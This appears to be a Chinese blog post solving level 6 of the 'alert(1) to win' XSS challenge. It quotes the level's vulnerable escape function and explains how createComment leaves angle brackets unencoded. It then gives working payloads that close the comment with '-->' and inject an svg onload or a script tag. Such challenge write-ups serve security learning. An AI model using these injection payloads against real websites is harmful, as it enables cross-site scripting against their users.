alert(1) to win 6

function escape(s) {
  // Slightly too lazy to make two input fields.
  // Pass in something like "TextNode#foo"
  var m = s.split(/#/);

  // Only slightly contrived at this point.
  var a = document.createElement('div');
  a.appendChild(document['create'+m[0]].apply(document, m.slice(1)));
  return a.innerHTML;
}

输入的内容:TextNode#foo

 createTextNode() 创建的是文本节点,不能解析成html元素标签,也就无法触发一些 on* 事件。

 

看下 createComment():

createComment()没有将"<"、">"编码,故可使用 "-->" 闭合注释。

payload:Comment#--><svg onload=alert(1)

不知道为何没有弹框,那就只有:Comment#--><script>alert(1)</script>

 

posted @ 2018-01-03 14:43  那天ws  阅读(190)  评论(0编辑  收藏  举报